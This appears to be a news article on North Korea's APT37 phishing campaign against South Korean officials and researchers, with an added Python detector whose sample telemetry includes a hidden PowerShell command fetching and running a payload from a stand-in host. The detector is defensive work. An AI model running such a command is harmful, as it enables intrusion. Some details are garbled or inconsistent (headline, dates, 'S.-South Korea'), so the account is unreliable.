North Korean cybercriminals deploy Seoul's confidential data against South Korean citizens for exploitation
In a recent development, the nation-state hacking group known as APT37 has broadened its targeting beyond the Korean peninsula, extending its reach to Japan, Vietnam, and the Middle East, and a wider range of industry verticals since 2017.
The group, also known under several names such as InkySquid, ScarCruft, Reaper, Group123, RedEyes, and Ricochet Chollima, has been linked to North Korea and was behind a large-scale spear-phishing campaign named Operation HanKook Phantom.
Cybersecurity company Mandiant published a report on August 29, 2023, confirming APT37's involvement in this attack, which targeted employees of the South Korean government and intelligence services.
The first campaign used the National Intelligence Research Society Newsletter - Issue 52 as a decoy document. The second attack chain, however, employed a document criticizing South Korea's attempts to improve inter-Korean relations and a July 28 statement issued by Kim Yō-jong, the Vice Department Director of the Central Committee of the Workers' Party of North Korea, as decoys.
The attacks began with the distribution of a legitimate-looking PDF, accompanied by a malicious LNK (Windows shortcut) file. In the second campaign, the LNK file was named 국가정보연구회 소식지(52호).pdf.
The dropper fetched a secondary payload (abs.tmp) from a command-and-control (C2) server via spoofed HTTP requests, executed it via PowerShell, and deleted traces. The intrusion chain included several methods to obfuscate the malicious payload and evade detection.
Executing the LNK file triggered the download of a payload or command execution, enabling the attacker to compromise the system. The payload delivered RokRAT, a backdoor commonly distributed as an encoded binary file.
At the same time, it exfiltrated files from %TEMP% via disguised POST requests (mimicking PDF uploads) before deleting them, relying on LOLBins, in-memory execution, and traffic blending to evade detection. The LNK file then self-deleted, and a batch script triggered a fileless stage of the attack.
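The two stages just described (a hidden PowerShell that stages and runs a .tmp payload from %TEMP%, then a POST disguised as a PDF upload from that same script host) can be correlated in endpoint telemetry. The following is an added detection example, not code from the report or any vendor; it assumes constructed process and HTTP events in a simplified key=value format, with made-up pids and reserved .invalid hostnames.

```python
import re

# Constructed sample telemetry (not from the report): one process-creation or
# outbound-HTTP record per line as "key=value" tokens; "cmd=" takes the rest.
# Hostnames use the reserved .invalid TLD; pids and byte counts are made up.
SAMPLE_EVENTS = [
    'type=process pid=4120 parent=explorer.exe image=powershell.exe '
    'cmd=powershell.exe -w hidden -c "iwr http://c2.invalid/abs.tmp '
    '-OutFile $env:TEMP\\abs.tmp; iex (gc $env:TEMP\\abs.tmp)"',
    "type=http pid=4120 method=POST host=c2.invalid "
    "content_type=application/pdf bytes=182044 uri=/upload",
    "type=process pid=5011 parent=explorer.exe image=winword.exe "
    "cmd=winword.exe C:\\Users\\a\\report.docx",
    "type=http pid=5011 method=GET host=update.invalid "
    "content_type=text/html bytes=1200 uri=/",
]

# LOLBin script hosts that have no legitimate reason to upload "PDFs".
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
HIDDEN_PS = re.compile(r"powershell(\.exe)?\s.*-w(indowstyle)?\s+hidden", re.I)
TEMP_PAYLOAD = re.compile(r"(%TEMP%|\$env:TEMP)\\[^\s\"']+\.tmp", re.I)


def parse_event(line: str) -> dict:
    """Turn one constructed event line into a dict; 'cmd=' swallows the rest."""
    head, sep, cmd = line.partition(" cmd=")
    fields = dict(tok.split("=", 1) for tok in head.split())
    if sep:
        fields["cmd"] = cmd
    return fields


def detect(lines) -> list:
    """Return (pid, reason) findings for the two stages of the chain."""
    findings, image_by_pid = [], {}
    for ev in map(parse_event, lines):
        if ev["type"] == "process":
            image_by_pid[ev["pid"]] = ev["image"].lower()
            cmd = ev.get("cmd", "")
            # Stage 1: hidden PowerShell staging and running a .tmp from %TEMP%.
            if HIDDEN_PS.search(cmd) and TEMP_PAYLOAD.search(cmd):
                findings.append((ev["pid"], "hidden PowerShell executes .tmp payload from %TEMP%"))
        elif ev["type"] == "http" and ev["method"] == "POST":
            # Stage 2: a script host posting "application/pdf" is traffic blending.
            if ev.get("content_type") == "application/pdf" and image_by_pid.get(ev["pid"]) in SCRIPT_HOSTS:
                findings.append((ev["pid"], "PDF-disguised POST from script host"))
    return findings


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(pid, reason)
```

The process event must precede the HTTP event for the same pid, which holds for ordered EDR telemetry but would need a two-pass join for unordered log exports.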
The primary targets of the first spear-phishing campaign include recipients of the newsletter, who are typically members of one or several of the following South Korean institutions: National Intelligence Research Association, Kwangwoon University, Korea University, Institute for National Security Strategy, Central Labor Economic Research Institute, Energy Security and Environment Association, National Salvation Spirit Promotion Association, Yangjihoe, Korea Integration Strategy.
In the second attack, targets included the Lee Jae-myung administration, the Ministry of Unification, the S.-South Korea Military Alliance, and the Asia-Pacific Economic Cooperation (APEC). Notably, in the second attack the decoy statement declared an end to reconciliation efforts and adopted a hostile, confrontation-based stance.
As the cyber threat landscape continues to evolve, it is crucial for organisations to stay vigilant and implement robust security measures to protect against such advanced persistent threats.